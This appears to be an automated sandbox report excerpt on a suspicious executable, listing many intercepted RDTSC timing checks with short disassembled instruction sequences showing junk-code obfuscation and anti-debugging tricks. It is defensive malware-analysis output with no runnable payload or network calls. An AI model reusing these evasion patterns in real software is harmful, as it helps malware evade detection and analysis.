Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5F5CC1 second address: 5F5CCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5F88BF second address: 5F88C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5F88C5 second address: 5F88D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC218F099BEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5F88D8 second address: 5F8955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+13633D4Eh], ebx 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007FC2192E8588h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c adc bh, FFFFFFD7h 0x0000002f mov edi, dword ptr [ebp+1363335Ch] 0x00000035 push edx 0x00000036 or dword ptr [ebp+137B0FBAh], ebx 0x0000003c pop ebx 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push edi 0x00000042 call 00007FC2192E8588h 0x00000047 pop edi 0x00000048 mov dword ptr [esp+04h], edi 0x0000004c add dword ptr [esp+04h], 0000001Dh 0x00000054 inc edi 0x00000055 push edi 0x00000056 ret 0x00000057 pop edi 0x00000058 ret 0x00000059 jnc 00007FC2192E8587h 0x0000005f xchg eax, esi 0x00000060 jl 00007FC2192E8590h 0x00000066 push eax 0x00000067 push edx 0x00000068 push ecx 0x00000069 pop ecx 0x0000006a rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5F990F second address: 5F9930 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC218F099BEh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnp 00007FC218F099BCh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5F9930 second address: 5F9934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5F9934 second address: 5F99B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC218F099C1h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007FC218F099B8h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 je 00007FC218F099C1h 0x0000002e jno 00007FC218F099BBh 0x00000034 push 00000000h 0x00000036 call 00007FC218F099C2h 0x0000003b pop edi 0x0000003c push 00000000h 0x0000003e mov edi, dword ptr [ebp+1363217Fh] 0x00000044 push eax 0x00000045 pushad 0x00000046 push edi 0x00000047 jl 00007FC218F099B6h 0x0000004d pop edi 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007FC218F099C2h 0x00000055 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5FCEAB second address: 5FCEB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5F7B59 second address: 5F7B5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5F9BEF second address: 5F9BF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5F7B5E second address: 5F7B8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC218F099C3h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jl 00007FC218F099CDh 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FC218F099BBh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5F7B8C second address: 5F7B90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5FEDE4 second address: 5FEDE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5FEDE9 second address: 5FEDFE instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC2192E858Ch 0x00000008 je 00007FC2192E8586h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5F9BF3 second address: 5F9BFD instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC218F099B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5FAB76 second address: 5FAB9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2192E8595h 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c je 00007FC2192E8588h 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5FAB9E second address: 5FABA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 600CA9 second address: 600D22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 call 00007FC2192E8598h 0x0000000d xor ebx, dword ptr [ebp+136324B9h] 0x00000013 pop edi 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007FC2192E8588h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 00000014h 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 mov edi, dword ptr [ebp+136338C5h] 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push eax 0x0000003b call 00007FC2192E8588h 0x00000040 pop eax 0x00000041 mov dword ptr [esp+04h], eax 0x00000045 add dword ptr [esp+04h], 00000017h 0x0000004d inc eax 0x0000004e push eax 0x0000004f ret 0x00000050 pop eax 0x00000051 ret 0x00000052 or dword ptr [ebp+136338CAh], ecx 0x00000058 xchg eax, esi 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5FDF37 second address: 5FDF3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5FD056 second address: 5FD0DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FC2192E8588h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov ebx, dword ptr [ebp+136332D1h] 0x0000002a push dword ptr fs:[00000000h] 0x00000031 sub edi, 5C04957Dh 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e push 00000000h 0x00000040 push ecx 0x00000041 call 00007FC2192E8588h 0x00000046 pop ecx 0x00000047 mov dword ptr [esp+04h], ecx 0x0000004b add dword ptr [esp+04h], 0000001Bh 0x00000053 inc ecx 0x00000054 push ecx 0x00000055 ret 0x00000056 pop ecx 0x00000057 ret 0x00000058 push ebx 0x00000059 push edx 0x0000005a adc di, 5DCFh 0x0000005f pop edi 0x00000060 pop ebx 0x00000061 mov eax, dword ptr [ebp+13630909h] 0x00000067 movzx ebx, cx 0x0000006a push FFFFFFFFh 0x0000006c mov di, 5A9Eh 0x00000070 mov dword ptr [ebp+137B0A6Ah], eax 0x00000076 push eax 0x00000077 pushad 0x00000078 pushad 0x00000079 push eax 0x0000007a push edx 0x0000007b rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 600D22 second address: 600D26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5FDF3B second address: 5FDF41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 600D26 second address: 600D42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5FDF41 second address: 5FDF4B instructions: 0x00000000 rdtsc 0x00000002 js 00007FC2192E858Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 600D42 second address: 600D57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC218F099C0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5FDF4B second address: 5FDF58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5FDF58 second address: 5FDF62 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC218F099B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 602C89 second address: 602D31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FC2192E8586h 0x00000009 jmp 00007FC2192E8598h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 and edi, dword ptr [ebp+13631D58h] 0x00000018 and ebx, dword ptr [ebp+13632F41h] 0x0000001e push 00000000h 0x00000020 mov dword ptr [ebp+13633140h], esi 0x00000026 xor ebx, dword ptr [ebp+137D4D0Ah] 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 call 00007FC2192E8588h 0x00000036 pop edx 0x00000037 mov dword ptr [esp+04h], edx 0x0000003b add dword ptr [esp+04h], 00000018h 0x00000043 inc edx 0x00000044 push edx 0x00000045 ret 0x00000046 pop edx 0x00000047 ret 0x00000048 jmp 00007FC2192E8596h 0x0000004d xchg eax, esi 0x0000004e js 00007FC2192E8596h 0x00000054 pushad 0x00000055 jmp 00007FC2192E858Ch 0x0000005a push esi 0x0000005b pop esi 0x0000005c popad 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 jmp 00007FC2192E858Fh 0x00000066 ja 00007FC2192E8586h 0x0000006c popad 0x0000006d rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 603B83 second address: 603C03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c movzx edi, si 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007FC218F099B8h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ebx 0x00000030 call 00007FC218F099B8h 0x00000035 pop ebx 0x00000036 mov dword ptr [esp+04h], ebx 0x0000003a add dword ptr [esp+04h], 00000016h 0x00000042 inc ebx 0x00000043 push ebx 0x00000044 ret 0x00000045 pop ebx 0x00000046 ret 0x00000047 jmp 00007FC218F099C8h 0x0000004c push eax 0x0000004d jc 00007FC218F099BEh 0x00000053 push ecx 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 604C35 second address: 604C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 push ecx 0x00000007 jo 00007FC2192E8586h 0x0000000d pop ecx 0x0000000e pushad 0x0000000f jbe 00007FC2192E8586h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5FFD3B second address: 5FFD45 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC218F099BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 601EC9 second address: 601ED3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 602E95 second address: 602E9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 605C14 second address: 605C18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 601ED3 second address: 601ED7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 602E9C second address: 602EA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 605C18 second address: 605C29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 602EA2 second address: 602EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5FEEF3 second address: 5FEEF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5FEEF7 second address: 5FEF05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 604E96 second address: 604EA0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC218F099B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5FEF05 second address: 5FEF0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 604EA0 second address: 604EA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5FEF0B second address: 5FEF12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 604EA6 second address: 604EAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 603DC5 second address: 603DD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FC2192E8586h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 605ECB second address: 605ECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 60D4F6 second address: 60D501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FC2192E8586h 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 60D501 second address: 60D509 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 60D509 second address: 60D50D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 60D50D second address: 60D547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC218F099C8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FC218F099C9h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 610F35 second address: 610F3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 610F3F second address: 610F4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 je 00007FC218F099B6h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 610F4C second address: 610F58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007FC2192E8586h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 610F58 second address: 610F5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 61362D second address: 613638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC2192E8586h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 619214 second address: 619218 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 619A92 second address: 619A96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 619A96 second address: 619A9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 619A9C second address: 619AA1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 619AA1 second address: 619AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 619AA7 second address: 619AB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 619AB0 second address: 619AC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FC218F099B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 619AC4 second address: 619ACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 619ACA second address: 619ACE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 619ACE second address: 619AF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2192E858Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FC2192E858Dh 0x00000011 push eax 0x00000012 pop eax 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 619AF3 second address: 619AF8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 619C53 second address: 619C57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 619DEB second address: 619E08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC218F099C4h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 61A083 second address: 61A0B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FC2192E8586h 0x00000009 je 00007FC2192E8586h 0x0000000f js 00007FC2192E8586h 0x00000015 popad 0x00000016 pushad 0x00000017 jmp 00007FC2192E8595h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 61A1BC second address: 61A1C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 61A1C2 second address: 61A1D9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jbe 00007FC2192E8586h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FC2192E858Bh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 61A38C second address: 61A392 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 61A392 second address: 61A396 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 61A396 second address: 61A3A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FC218F099B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 61ED4D second address: 61ED51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5E73DD second address: 5E73E2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5E73E2 second address: 5CE04E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007FC2192E8588h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 and edi, 62FC4A9Fh 0x0000002a call dword ptr [ebp+136329EAh] 0x00000030 push eax 0x00000031 push edx 0x00000032 push ebx 0x00000033 jmp 00007FC2192E858Ah 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
